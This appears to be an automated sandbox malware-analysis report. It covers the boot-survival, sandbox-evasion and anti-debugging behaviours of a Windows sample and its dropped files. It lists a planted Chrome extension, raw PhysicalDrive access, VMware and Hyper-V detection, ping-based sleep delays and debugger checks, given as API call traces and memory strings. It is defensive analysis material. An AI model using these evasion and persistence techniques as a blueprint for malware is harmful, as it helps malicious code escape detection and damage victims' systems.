Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\jquery-1.8.3.min.jsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\popup.jsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\manifest.jsonJump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_04FABE50 _memset,SHGetSpecialFolderPathA,_strcat_s,PathFileExistsA,_memset,GetPrivateProfileStringA,_strlen,_strlen,PathRemoveFileSpecA,_strcat_s,_strcat_s,PathFileExistsA,PathFindFileNameA,21_2_04FABE50

Boot Survival:

barindex
Contains functionality to infect the boot sectorShow sources
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,FindCloseChangeNotification, \\.\PhysicalDrive%d4_2_1001DA70
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d4_2_1001D7E0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d4_2_1001D370
Source: C:\Windows\SysWOW64\msiexec.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\1607186572092.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\1607186588295.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Contains functionality to detect sleep reduction / modificationsShow sources
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_100202D04_2_100202D0
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_04F05AA021_2_04F05AA0
Uses ping.exe to sleepShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_10019780 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA,4_2_10019780
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_04F05AA021_2_04F05AA0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_100202D04_2_100202D0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe TID: 5536Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe TID: 5604Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe TID: 4744Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe TID: 3748Thread sleep count: 31 > 30Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe TID: 3748Thread sleep time: -62000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe TID: 5688Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_100223C0 GetLocalTime followed by cmp: cmp ecx, 01h and CTI: jl 10022474h4_2_100223C0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_100223C0 GetLocalTime followed by cmp: cmp edx, 08h and CTI: jnle 10022474h4_2_100223C0
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_6E660F62 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,0_2_6E660F62
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_6E651C23 __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,0_2_6E651C23
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_0121A534 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,1_2_0121A534
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_0123A928 FindFirstFileExA,1_2_0123A928
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_0122B820 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,1_2_0122B820
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_00402D09 FindFirstFileA,4_2_00402D09
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_0040693B DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,4_2_0040693B
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_004066CC FindFirstFileA,FindClose,4_2_004066CC
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_1001A170 FindFirstFileA,FindClose,4_2_1001A170
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_026DC704 PathFileExistsW,FindFirstFileW,FindClose,21_2_026DC704
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_026E1F70 FindFirstFileW,FindClose,@_RTC_CheckStackVars@8,21_2_026E1F70
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_04FA7950 PathFileExistsA,_memset,_memset,_strcpy_s,_strcat_s,FindFirstFileA,_memset,_strcpy_s,_strcat_s,_strcat_s,_strcat_s,_strcat_s,PathFileExistsA,PathRemoveFileSpecA,_memset,_strlen,FindNextFileA,FindClose,21_2_04FA7950
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_04FA5A90 FindFirstFileA,FindClose,21_2_04FA5A90
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_0122DBC8 VirtualQuery,GetSystemInfo,1_2_0122DBC8
Source: 1E1C360C582DF797.exe, 00000015.00000003.563174149.0000000005D84000.00000004.00000001.sdmpBinary or memory string: {4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI
Source: 1E1C360C582DF797.exe, 00000015.00000003.552028868.0000000005D11000.00000004.00000001.sdmpBinary or memory string: NetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueueSWDMicrosoft Print to PDF{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}
Source: 1E1C360C582DF797.exe, 00000015.00000003.551853011.0000000005D84000.00000004.00000001.sdmpBinary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueue
Source: 1E1C360C582DF797.exe, 00000015.00000003.549908726.0000000005D11000.00000004.00000001.sdmpBinary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}
Source: 1E1C360C582DF797.exe, 00000015.00000003.551758159.0000000005D57000.00000004.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.652027273.00000000041F0000.00000004.00000001.sdmpBinary or memory string: Microsoft Hyper-V Generation Counter
Source: 1E1C360C582DF797.exe, 00000015.00000003.551758159.0000000005D57000.00000004.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.652027273.00000000041F0000.00000004.00000001.sdmpBinary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueueSWDMicrosoft Print to PDF{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}
Source: 1E1C360C582DF797.exe, 00000019.00000002.650414355.000000000019B000.00000004.00000010.sdmpBinary or memory string: VMware Virtual disk 2.0
Source: 1E1C360C582DF797.exe, 00000019.00000002.650414355.000000000019B000.00000004.00000010.sdmpBinary or memory string: VMware
Source: 1E1C360C582DF797.exe, 00000015.00000003.549962480.000000000415C000.00000004.00000001.sdmpBinary or memory string: Microsoft Hyper-V Generation Counter ID
Source: 1E1C360C582DF797.exe, 00000015.00000003.551997697.0000000005D36000.00000004.00000001.sdmpBinary or memory string: SystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueue
Source: C:\Users\user\AppData\Roaming\1607186572092.exeProcess information queried: ProcessInformation

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)Show sources
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_10019FF0 GetCurrentProcess,CheckRemoteDebuggerPresent,4_2_10019FF0
Hides threads from debuggersShow sources
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeProcess queried: DebugPortJump to behavior
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeProcess queried: DebugPortJump to behavior
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeProcess queried: DebugObjectHandleJump to behavior
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeProcess queried: DebugFlagsJump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_6E6652CE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6E6652CE
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_6E65041D OutputDebugStringA,GetLastError,0_2_6E65041D
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_6E672571 mov eax, dword ptr fs:[00000030h]0_2_6E672571
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_6E6780EB mov eax, dword ptr fs:[00000030h]0_2_6E6780EB
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_01237363 mov eax, dword ptr fs:[00000030h]1_2_01237363
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_00404C06 mov eax, dword ptr fs:[00000030h]4_2_00404C06
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_10019DE0 mov eax, dword ptr fs:[00000030h]4_2_10019DE0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_10019E13 mov eax, dword ptr fs:[00000030h]4_2_10019E13
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_10019E13 mov eax, dword ptr fs:[00000030h]4_2_10019E13
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_10019E70 mov eax, dword ptr fs:[00000030h]4_2_10019E70
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_10019E70 mov eax, dword ptr fs:[00000030h]4_2_10019E70
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_10019ED0 mov eax, dword ptr fs:[00000030h]4_2_10019ED0
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_6E631660 GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,CloseHandle,GetProcessHeap,HeapFree,0_2_6E631660
